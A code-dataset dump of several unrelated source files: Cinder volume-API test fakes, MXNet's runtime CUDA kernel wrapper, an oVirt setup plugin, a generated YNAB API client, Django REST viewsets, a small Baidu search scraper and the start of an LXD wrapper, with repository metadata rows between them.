# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
from cinder import exception as exc
from cinder import objects
from cinder.objects import fields
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder import utils
DEFAULT_VOL_NAME = "displayname"
DEFAULT_VOL_DESCRIPTION = "displaydesc"
DEFAULT_VOL_SIZE = 1
DEFAULT_VOL_TYPE = "vol_type_name"
DEFAULT_VOL_STATUS = "fakestatus"
DEFAULT_VOL_ID = fake.VOLUME_ID
# TODO(vbala): api.v1 tests use hard-coded "fakeaz" for verifying
# post-conditions. Update value to "zone1:host1" once we remove
# api.v1 tests and use it in api.v2 tests.
DEFAULT_AZ = "fakeaz"
def create_fake_volume(id, **kwargs):
volume = {
'id': id,
'user_id': fake.USER_ID,
'project_id': fake.PROJECT_ID,
'host': 'fakehost',
'size': DEFAULT_VOL_SIZE,
'availability_zone': DEFAULT_AZ,
'status': DEFAULT_VOL_STATUS,
'migration_status': None,
'attach_status': fields.VolumeAttachStatus.ATTACHED,
'name': 'vol name',
'display_name': DEFAULT_VOL_NAME,
'display_description': DEFAULT_VOL_DESCRIPTION,
'updated_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'created_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'snapshot_id': None,
'source_volid': None,
'volume_type_id': '3e196c20-3c06-11e2-81c1-0800200c9a66',
'encryption_key_id': None,
'volume_admin_metadata': [{'key': 'attached_mode', 'value': 'rw'},
{'key': 'readonly', 'value': 'False'}],
'bootable': False,
'launched_at': datetime.datetime(1900, 1, 1, 1, 1, 1,
tzinfo=iso8601.iso8601.Utc()),
'volume_type': fake_volume.fake_db_volume_type(name=DEFAULT_VOL_TYPE),
'replication_status': 'disabled',
'replication_extended_status': None,
'replication_driver_data': None,
'volume_attachment': [],
'multiattach': False,
}
volume.update(kwargs)
if kwargs.get('volume_glance_metadata', None):
volume['bootable'] = True
if kwargs.get('attach_status') == fields.VolumeAttachStatus.DETACHED:
del volume['volume_admin_metadata'][0]
return volume
def fake_volume_create(self, context, size, name, description, snapshot=None,
**param):
vol = create_fake_volume(DEFAULT_VOL_ID)
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
source_volume = param.get('source_volume') or {}
vol['source_volid'] = source_volume.get('id')
vol['bootable'] = False
vol['volume_attachment'] = []
vol['multiattach'] = utils.get_bool_param('multiattach', param)
try:
vol['snapshot_id'] = snapshot['id']
except (KeyError, TypeError):
vol['snapshot_id'] = None
vol['availability_zone'] = param.get('availability_zone', 'fakeaz')
return vol
def fake_volume_api_create(self, context, *args, **kwargs):
vol = fake_volume_create(self, context, *args, **kwargs)
return fake_volume.fake_volume_obj(context, **vol)
def fake_image_service_detail(self, context, **kwargs):
filters = kwargs.get('filters', {'name': ''})
if filters['name'] == "Fedora-x86_64-20-20140618-sda":
return [{'id': "c905cedb-7281-47e4-8a62-f26bc5fc4c77"}]
elif filters['name'] == "multi":
return [{'id': "c905cedb-7281-47e4-8a62-f26bc5fc4c77"},
{'id': "c905cedb-abcd-47e4-8a62-f26bc5fc4c77"}]
return []
def fake_volume_create_from_image(self, context, size, name, description,
snapshot, volume_type, metadata,
availability_zone):
vol = create_fake_volume(fake.VOLUME_ID)
vol['status'] = 'creating'
vol['size'] = size
vol['display_name'] = name
vol['display_description'] = description
vol['availability_zone'] = 'cinder'
vol['bootable'] = False
return vol
def fake_volume_update(self, context, *args, **param):
pass
def fake_volume_delete(self, context, *args, **param):
pass
def fake_volume_get(self, context, volume_id, viewable_admin_meta=False):
if viewable_admin_meta:
return create_fake_volume(volume_id)
else:
volume = create_fake_volume(volume_id)
del volume['volume_admin_metadata']
return volume
def fake_volume_get_notfound(self, context,
volume_id, viewable_admin_meta=False):
raise exc.VolumeNotFound(volume_id)
def fake_volume_get_db(context, volume_id):
if context.is_admin:
return create_fake_volume(volume_id)
else:
volume = create_fake_volume(volume_id)
del volume['volume_admin_metadata']
return volume
def fake_volume_api_get(self, context, volume_id, viewable_admin_meta=False):
vol = create_fake_volume(volume_id)
return fake_volume.fake_volume_obj(context, **vol)
def fake_volume_get_all(context, search_opts=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, filters=None,
viewable_admin_meta=False, offset=None):
return [create_fake_volume(fake.VOLUME_ID, project_id=fake.PROJECT_ID),
create_fake_volume(fake.VOLUME2_ID, project_id=fake.PROJECT2_ID),
create_fake_volume(fake.VOLUME3_ID, project_id=fake.PROJECT3_ID)]
def fake_volume_get_all_by_project(self, context, marker, limit,
sort_keys=None, sort_dirs=None,
filters=None,
viewable_admin_meta=False, offset=None):
return [fake_volume_get(self, context, fake.VOLUME_ID,
viewable_admin_meta=True)]
def fake_volume_api_get_all_by_project(self, context, marker, limit,
sort_keys=None, sort_dirs=None,
filters=None,
viewable_admin_meta=False,
offset=None):
vol = fake_volume_get(self, context, fake.VOLUME_ID,
viewable_admin_meta=viewable_admin_meta)
vol_obj = fake_volume.fake_volume_obj(context, **vol)
return objects.VolumeList(objects=[vol_obj])
def fake_snapshot(id, **kwargs):
snapshot = {'id': id,
'volume_id': fake.VOLUME_ID,
'status': fields.SnapshotStatus.AVAILABLE,
'volume_size': 100,
'created_at': None,
'display_name': 'Default name',
'display_description': 'Default description',
'project_id': fake.PROJECT_ID,
'snapshot_metadata': []}
snapshot.update(kwargs)
return snapshot
def fake_snapshot_get_all(context, filters=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, offset=None):
return [fake_snapshot(fake.VOLUME_ID, project_id=fake.PROJECT_ID),
fake_snapshot(fake.VOLUME2_ID, project_id=fake.PROJECT2_ID),
fake_snapshot(fake.VOLUME3_ID, project_id=fake.PROJECT3_ID)]
def fake_snapshot_get_all_by_project(context, project_id, filters=None,
marker=None, limit=None, sort_keys=None,
sort_dirs=None, offset=None):
return [fake_snapshot(fake.SNAPSHOT_ID)]
def fake_snapshot_update(self, context, *args, **param):
pass
def fake_service_get_all(*args, **kwargs):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
def fake_service_get_all_by_topic(context, topic, disabled=None):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
def fake_snapshot_get(self, context, snapshot_id):
if snapshot_id == fake.WILL_NOT_BE_FOUND_ID:
raise exc.SnapshotNotFound(snapshot_id=snapshot_id)
return fake_snapshot(snapshot_id)
def fake_consistencygroup_get_notfound(self, context, cg_id):
raise exc.GroupNotFound(group_id=cg_id)
def fake_volume_type_get(context, id, *args, **kwargs):
return {'id': id,
'name': 'vol_type_name',
'description': 'A fake volume type',
'is_public': True,
'projects': [],
'extra_specs': {},
'created_at': None,
'deleted_at': None,
'updated_at': None,
'qos_specs_id': fake.QOS_SPEC_ID,
'deleted': False}
def fake_volume_admin_metadata_get(context, volume_id, **kwargs):
admin_meta = {'attached_mode': 'rw', 'readonly': 'False'}
if kwargs.get('attach_status') == fields.VolumeAttachStatus.DETACHED:
del admin_meta['attached_mode']
return admin_meta
| 36.174242
| 78
| 0.638953
|
9da38c6aaaf52bf08d090cd5a6861aa0013d608e
| 4,907
|
py
|
Python
|
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | 4
|
2017-11-17T07:28:09.000Z
|
2019-07-23T06:24:16.000Z
|
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | null | null | null |
python/mxnet/rtc.py
|
Najah-lshanableh/Deep_learning
|
4b8235bdacd319843dda7b331f207808e4a90a93
|
[
"Apache-2.0"
] | 2
|
2019-06-12T12:40:20.000Z
|
2020-11-03T14:33:14.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Interface to runtime cuda kernel compile module."""
from __future__ import absolute_import
import ctypes
from .base import _LIB, NDArrayHandle, RtcHandle, mx_uint, c_array, check_call
class Rtc(object):
"""MXRtc object in mxnet.
This class allow you to write CUDA kernels in Python
and call them with NDArray.
Parameters
----------
name : str
Name of the kernel.
inputs : tuple of (str, mxnet.ndarray)
List of input names and ndarray.
outputs : tuple of (str, mxnet.ndarray)
List of output names and ndarray.
kernel : str
The actual kernel code.
Note that this is only the body of the kernel, i.e.
after { and before }. Rtc will decorate the kernel.
For example, if ``name = "mykernel"`` and
inputs = [('x', mx.nd.zeros((10,)))]
outputs = [('y', mx.nd.zeros((10,)))]
kernel = "y[threadIdx.x] = x[threadIdx.x];",
then the compiled kernel will be:
extern "C" __global__ mykernel(float *x, float *y) {
const int x_ndim = 1;
const int x_dims = { 10 };
const int y_ndim = 1;
const int y_dims = { 10 };
y[threadIdx.x] = x[threadIdx.x];
}
"""
def __init__(self, name, inputs, outputs, kernel):
self.handle = RtcHandle()
input_names = ctypes.cast(c_array(ctypes.c_char_p, [i[0] for i in inputs]),
ctypes.POINTER(ctypes.c_char_p))
output_names = ctypes.cast(c_array(ctypes.c_char_p, [i[0] for i in outputs]),
ctypes.POINTER(ctypes.c_char_p))
input_nds = ctypes.cast(c_array(NDArrayHandle, [i[1].handle for i in inputs]),
ctypes.POINTER(NDArrayHandle))
output_nds = ctypes.cast(c_array(NDArrayHandle, [i[1].handle for i in outputs]),
ctypes.POINTER(NDArrayHandle))
check_call(_LIB.MXRtcCreate(ctypes.c_char_p(name),
mx_uint(len(inputs)),
mx_uint(len(outputs)),
input_names,
output_names,
input_nds,
output_nds,
ctypes.c_char_p(kernel),
ctypes.byref(self.handle)))
def __del__(self):
check_call(_LIB.MXRtcFree(self.handle))
def push(self, inputs, outputs, grid_dims, block_dims):
"""Run the kernel.
Parameters
----------
inputs : list of NDArray
List of inputs. Can contain different NDArrays than those used for the constructor,
but its elements must have the same shapes and appear in the same order.
outputs : list of NDArray
List of outputs. Can contain different ndarrays than used for the constructor,
but must have the same shapes and appear in the same order.
grid_dims : tuple of 3 uint
Grid dimension for kernel launch.
block_dims : tuple of 3 uint
Block dimension for kernel launch.
"""
input_nds = ctypes.cast(c_array(NDArrayHandle, [i.handle for i in inputs]),
ctypes.POINTER(NDArrayHandle))
output_nds = ctypes.cast(c_array(NDArrayHandle, [i.handle for i in outputs]),
ctypes.POINTER(NDArrayHandle))
check_call(_LIB.MXRtcPush(self.handle,
mx_uint(len(inputs)),
mx_uint(len(outputs)),
input_nds,
output_nds,
mx_uint(grid_dims[0]),
mx_uint(grid_dims[1]),
mx_uint(grid_dims[2]),
mx_uint(block_dims[0]),
mx_uint(block_dims[1]),
mx_uint(block_dims[2])))
| 45.018349
| 95
| 0.560016
|
5365252bc3441061bd5480afc3dcb18a728825e6
| 4,244
|
py
|
Python
|
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
packaging/setup/plugins/ovirt-engine-common/base/remote_engine/remote_engine_manual_files.py
|
UranusBlockStack/ovirt-engine
|
fe3c90ed3e74e6af9497c826c82e653382946ae1
|
[
"Apache-2.0"
] | null | null | null |
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2014-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gettext
import os
import tempfile
from otopi import plugin, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup import remote_engine_base
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
class _ManualFiles(remote_engine_base.RemoteEngineBase):
def __init__(self, plugin):
super(Plugin._ManualFiles, self).__init__(plugin=plugin)
self._plugin = plugin
self._tempfiles = []
@property
def plugin(self):
return self._plugin
@property
def dialog(self):
return self._plugin.dialog
@property
def environment(self):
return self._plugin.environment
@property
def logger(self):
return self._plugin.logger
@property
def name(self):
return osetupcons.Const.REMOTE_ENGINE_SETUP_STYLE_MANUAL_FILES
def desc(self):
return _(
'Perform each action manually, use files to copy content '
'around'
)
def configure(self, fqdn):
self._fqdn = fqdn
def execute_on_engine(self, cmd, timeout=60, text=None):
self.dialog.note(
text=text if text else _(
'Please run on the engine server:\n\n'
'{cmd}\n\n'
).format(
cmd=cmd
)
)
def copy_from_engine(self, file_name, dialog_name):
resfilename = self.dialog.queryString(
name=dialog_name,
note=_(
'Please copy {file_name} from the engine server to some '
'file here.\n'
'Please input the location of the local file where you '
'copied {file_name} from the engine server: '
),
prompt=True,
)
with open(resfilename) as f:
res = f.read()
return res
def copy_to_engine(self, file_name, content, inp_env_key):
fname = self.environment.get(inp_env_key)
with (
open(fname, 'w') if fname
else tempfile.NamedTemporaryFile(mode='w', delete=False)
) as inpfile:
inpfile.write(content)
self.dialog.note(
text=_(
'Please copy {inpfile} from here to {file_name} on the '
'engine server.\n'
).format(
inpfile=inpfile.name,
file_name=file_name,
)
)
self._tempfiles.append(fname)
def cleanup(self):
for f in self._tempfiles:
if f is not None:
try:
os.unlink(f.name)
except OSError:
self.logger.debug(
"Failed to delete '%s'",
f.name,
exc_info=True,
)
def __init__(self, context):
super(Plugin, self).__init__(context=context)
@plugin.event(
stage=plugin.Stages.STAGE_SETUP,
)
def _setup(self):
self.environment[
osetupcons.ConfigEnv.REMOTE_ENGINE_SETUP_STYLES
].append(
self._ManualFiles(
plugin=self,
)
)
# vim: expandtab tabstop=4 shiftwidth=4
| 29.472222
| 77
| 0.542884
|
e72f5bc0e759f4053138ce8a20675e9c783b8ace
| 9,572
|
py
|
Python
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 4
|
2018-12-02T19:55:40.000Z
|
2021-02-28T13:13:45.000Z
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 10
|
2018-07-22T06:52:16.000Z
|
2022-01-09T14:05:49.000Z
|
ynab_client/api/scheduled_transactions_api.py
|
Pezmc/ynab-client-python
|
6d154f3efecef6a5c3ff1cf89d8a2a59f9f7bb97
|
[
"Apache-2.0"
] | 10
|
2018-09-11T01:01:44.000Z
|
2022-01-09T13:54:50.000Z
|
# coding: utf-8
"""
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ynab_client.api_client import ApiClient
class ScheduledTransactionsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_scheduled_transaction_by_id(self, budget_id, scheduled_transaction_id, **kwargs): # noqa: E501
"""Single scheduled transaction # noqa: E501
Returns a single scheduled transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transaction_by_id(budget_id, scheduled_transaction_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:param str scheduled_transaction_id: The ID of the Scheduled Transaction. (required)
:return: ScheduledTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, **kwargs) # noqa: E501
else:
(data) = self.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, **kwargs) # noqa: E501
return data
def get_scheduled_transaction_by_id_with_http_info(self, budget_id, scheduled_transaction_id, **kwargs): # noqa: E501
"""Single scheduled transaction # noqa: E501
Returns a single scheduled transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transaction_by_id_with_http_info(budget_id, scheduled_transaction_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:param str scheduled_transaction_id: The ID of the Scheduled Transaction. (required)
:return: ScheduledTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['budget_id', 'scheduled_transaction_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_scheduled_transaction_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'budget_id' is set
if ('budget_id' not in params or
params['budget_id'] is None):
raise ValueError("Missing the required parameter `budget_id` when calling `get_scheduled_transaction_by_id`") # noqa: E501
# verify the required parameter 'scheduled_transaction_id' is set
if ('scheduled_transaction_id' not in params or
params['scheduled_transaction_id'] is None):
raise ValueError("Missing the required parameter `scheduled_transaction_id` when calling `get_scheduled_transaction_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'budget_id' in params:
path_params['budget_id'] = params['budget_id'] # noqa: E501
if 'scheduled_transaction_id' in params:
path_params['scheduled_transaction_id'] = params['scheduled_transaction_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/budgets/{budget_id}/scheduled_transactions/{scheduled_transaction_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTransactionResponse', # noqa: E501
auth_settings=auth_settings,
is_async=params.get('is_async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_scheduled_transactions(self, budget_id, **kwargs): # noqa: E501
"""List scheduled transactions # noqa: E501
Returns all scheduled transactions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transactions(budget_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:return: ScheduledTransactionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_scheduled_transactions_with_http_info(budget_id, **kwargs) # noqa: E501
else:
(data) = self.get_scheduled_transactions_with_http_info(budget_id, **kwargs) # noqa: E501
return data
def get_scheduled_transactions_with_http_info(self, budget_id, **kwargs): # noqa: E501
"""List scheduled transactions # noqa: E501
Returns all scheduled transactions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_scheduled_transactions_with_http_info(budget_id, async=True)
>>> result = thread.get()
:param async bool
:param str budget_id: The ID of the Budget. (required)
:return: ScheduledTransactionsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['budget_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_scheduled_transactions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'budget_id' is set
if ('budget_id' not in params or
params['budget_id'] is None):
raise ValueError("Missing the required parameter `budget_id` when calling `get_scheduled_transactions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'budget_id' in params:
path_params['budget_id'] = params['budget_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/budgets/{budget_id}/scheduled_transactions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTransactionsResponse', # noqa: E501
auth_settings=auth_settings,
is_async=params.get('is_async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.081545
| 294
| 0.643962
|
14fc6f2abfd17641e1e0bc7d0033e17f9c61bbcd
| 1,152
|
py
|
Python
|
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | 7
|
2022-02-25T03:27:01.000Z
|
2022-03-22T10:51:13.000Z
|
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | null | null | null |
drf/drf_crud/app/views.py
|
taptorestart/python-backend-examples
|
0817223f403570f5822511c240726c6108d3b9b7
|
[
"MIT"
] | 1
|
2022-03-24T14:47:49.000Z
|
2022-03-24T14:47:49.000Z
|
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from rest_framework import permissions
from app.serializers import UserSerializer, GroupSerializer, CategorySerializer, BeverageSerializer
from app.models import Category, Beverage
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
permission_classes = [permissions.IsAuthenticated]
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
permission_classes = [permissions.IsAuthenticated]
class CategoryViewSet(viewsets.ModelViewSet):
queryset = Category.objects.all()
serializer_class = CategorySerializer
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head']
permission_classes = [permissions.IsAuthenticated]
class BeverageViewSet(viewsets.ModelViewSet):
queryset = Beverage.objects.all()
serializer_class = BeverageSerializer
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head']
permission_classes = [permissions.IsAuthenticated]
| 36
| 99
| 0.773438
|
4fd33886c3fdafce581c2aa3e123cbef9dd16ba0
| 2,731
|
py
|
Python
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
wangchuanli001/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 12
|
2019-12-07T01:44:55.000Z
|
2022-01-27T14:13:30.000Z
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
hujiese/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 23
|
2020-05-23T03:56:33.000Z
|
2022-02-28T07:54:45.000Z
|
python-博客网站内容爬取/PyCharm_article/com/article/spider/m_baidu.py
|
hujiese/Project-experience
|
b563c5c3afc07c913c2e1fd25dff41c70533f8de
|
[
"Apache-2.0"
] | 7
|
2019-12-20T04:48:56.000Z
|
2021-11-19T02:23:45.000Z
|
# -*- coding: utf-8 -*-
import socket
import threading
import jieba
import requests
from bs4 import BeautifulSoup
import urllib.request
import random
import time
import sql_operation
import ast
import sys
import codecs
def page_html(keyword):
print('\n当前关键字 : ' + keyword)
socket.setdefaulttimeout(10) # 设置全局超时时间 学会php可以干什么 php是什么
url = "http://m.baidu.com/s?word=" + keyword
user_agents = [
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 "]
user_agent = random.choice(user_agents)
headers = {
'User-Agent': user_agent,
'Accept-Encoding': 'gzip'}
try:
req = requests.get(url=url, headers=headers)
html_doc = req.text
soup = BeautifulSoup(html_doc, "html.parser")
titles = soup.select('article > header > div > a')
links = soup.select('span.c-color-gray')
# links2 = soup.select('div.c-showurl c-line-clamp1')
print("网页解析完毕")
page_list = []
php_list = ['php中文网', 'PHP中文网', 'm.php.cn']
for temp in titles:
# print(temp.get('aria-roledescription'), temp.get_text())
page_list.append(temp.get_text())
for temp in links:
page_list.append(temp.get_text())
# print(page_list)
for flag in php_list:
for temp in page_list:
if temp.find(flag) != -1:
print(keyword+" "+temp, ' ++++++++++++++++++++++++++++')
return False
return True
except Exception as e:
print(e)
print("重新进行尝试连接")
page_html(keyword)
def readfile():
fileio = open('keyword_relevant.txt', 'r+', encoding='utf-8')
keywords = fileio.read().split('\n')
php_list = []
fileio.seek(0, 0)
for keyword in keywords:
if page_html(keyword):
fileio.write(keyword + '\n')
else:
php_list.append(keyword)
if len(php_list) > 0:
for temp in php_list:
fileio.write(temp + ' php中文网已有\n')
fileio.close()
if __name__ == '__main__': # php是什么
# page_html('php是什么')
readfile()
| 34.56962
| 144
| 0.586964
|
71bc65b20e9bba97fada7a826bc4cbe7dc2080bd
| 78
|
py
|
Python
|
sancus/lib/cogs/games/__init__.py
|
Solar-Productions/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-09-03T22:52:27.000Z
|
2021-09-03T22:52:27.000Z
|
sancus/lib/cogs/games/__init__.py
|
LunarDevelop/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-10-10T22:11:51.000Z
|
2021-10-10T22:11:51.000Z
|
sancus/lib/cogs/games/__init__.py
|
Solar-Productions/sancus
|
eb3c5c702bc5574c62b488c0e3bb06a36159e651
|
[
"Apache-2.0"
] | 1
|
2021-11-11T16:04:02.000Z
|
2021-11-11T16:04:02.000Z
|
from .games import Games
def setup(client):
client.add_cog(Games(client))
| 19.5
| 33
| 0.74359
|
54e5e3dd9be57419f29e832916ea7f8449b510b7
| 481
|
py
|
Python
|
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | null | null | null |
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | 38
|
2019-05-29T10:17:00.000Z
|
2020-02-20T05:35:41.000Z
|
conv_mechanics/tip.py
|
devinmcgloin/advent-term
|
96fd3ca408b3437518830e354ea3ccfa790fd191
|
[
"Apache-2.0"
] | null | null | null |
"""
utility functions to determine if a command is a tip or not.
"""
import re
is_tip_regex = re.compile("^tip *\$?(?:0|[1-9]\d{0,2}(?:,?\d{3})*)(?:\.\d+)?$")
amount_regex = re.compile("-?(?:0|[1-9]\d{0,2}(?:,?\d{3})*)(?:\.\d+)?$")
def is_tip(user_response):
if re.match(is_tip_regex, user_response) is not None:
return True
return False
def tip_amount(user_response):
matches = re.findall(amount_regex, user_response)
return max(map(float, matches))
| 24.05
| 79
| 0.615385
|
f0440ee7e2ae41df976f5a4dfb451d768828056a
| 4,806
|
py
|
Python
|
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | 3
|
2020-06-11T18:33:27.000Z
|
2021-02-21T13:48:06.000Z
|
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | null | null | null |
src/benchmark/api/api_lxd.py
|
edvgui/LEPL2990-Benchmark-tool
|
be9bf7e62be215ec14ee5fddb91166bb8861090e
|
[
"MIT"
] | null | null | null |
import subprocess
import time
from exceptions.api_exception import ApiException
class LXCApiException(ApiException):
def __init__(self, message, trace):
super().__init__("LXD", message, trace)
def init(image, flags, log=False):
"""
Initialize a container from an image with the command 'lxc init'
:param image: The name of the image to create the container from
:param flags: Some flags to pass for the creation
:param log: Whether to display some logs or not
:return: The id of the created container, the command execution time
"""
args = ["lxc", "init", image]
args.extend(flags)
tic = time.time()
